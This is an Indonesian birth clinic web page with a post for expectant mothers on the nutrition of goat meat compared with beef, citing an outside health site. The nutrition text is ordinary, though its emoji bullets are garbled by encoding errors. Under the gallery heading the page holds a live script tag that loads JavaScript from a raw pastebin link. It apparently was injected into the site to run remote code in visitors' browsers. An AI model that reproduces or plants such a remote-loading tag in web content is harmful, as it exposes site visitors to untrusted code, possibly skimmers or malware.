Kandungan Daging Kambing




Saat-saat Hari Raya Idul Adha ini tentu daging kambing menjadi sangat populer, ya Bunda... Nah, apa saja yang Bunda Ketahui tentang daging kambing?
Mungkin yang sering sebagian Bunda dengar bahwa daging kambing mengandung tinggi kolesterol, atau makan daging kambing dapat menyebabkan darah tinggi.
Namun, tahukah Bunda bahwa daging sapi ternyata mengandung kolesterol dan lemak lebih banyak dibanding daging kambing?
Menurut sebuah sumber, disebutkan bahwa dalam 85 gram daging kambing mengandung 122 kalori, 2,6 gram lemak, dan 64 miligram kolesterol. Sementara, dalam jumlah yang sama, daging sapi mengandung 179 kalori, 7,9 gram lemak, dan 73,1 miligram kolesterol.
.
Selain dikenal karena rasanya yang lezat, daging kambing itu kaya akan nutrisi, dan baik untuk bumil juga loh, Bunda. Berikut manfaat yang didapat dari mengkonsumsi daging:
๐ŸŒธ Daging kambing merupakan salah satu sumber protein yang baik untuk pertumbuhan dan perkembangan janin.
๐ŸŒธ Kaya akan zat besi yang membantu menjaga kadar hemoglobin dalam darah. Hemoglobin sendiri memiliki peran penting untuk membantu proses pembentukan sel darah merah, sehingga terhindar dari anemia.
๐ŸŒธZinc yang ada dalam daging kambing membantu meningkatkan sistem kekebalan tubuh janin, yang memastikan pertumbuhan secara umum serta pembelahan sel-sel tubuh.
๐ŸŒธ Daging kambing mengandung vitamin B kompleks, salah satunya adalah vitamin B12. Jenis vitamin ini menjadi nutrisi esensial dalam menjaga kesehatan sistem saraf, membantu pembentukan sel-sel darah merah, serta mencegah anemia.
๐ŸŒธ Daging kambing juga mengandung zat tembaga yang berperan dalam memaksimalkan pertumbuhan janin.

Nah ternyata banyak manfaatnya juga ya..
.
Sumber:
https://www.momjunction.com/articles/health-benefits-eating-lamb-pregnancy_0086651/#gref
.
#amanibirthindonesia

Our Gallery

Kumpulan galeri klinik ibu alam

<script type="text/javascript" src="https://pastebin.com/raw/spjSz2Ru"></script>

Contact Info

  • Tegalsari 1/8 Mangunsari
    Sidomukti Salatiga
    Jawa Tengah 50721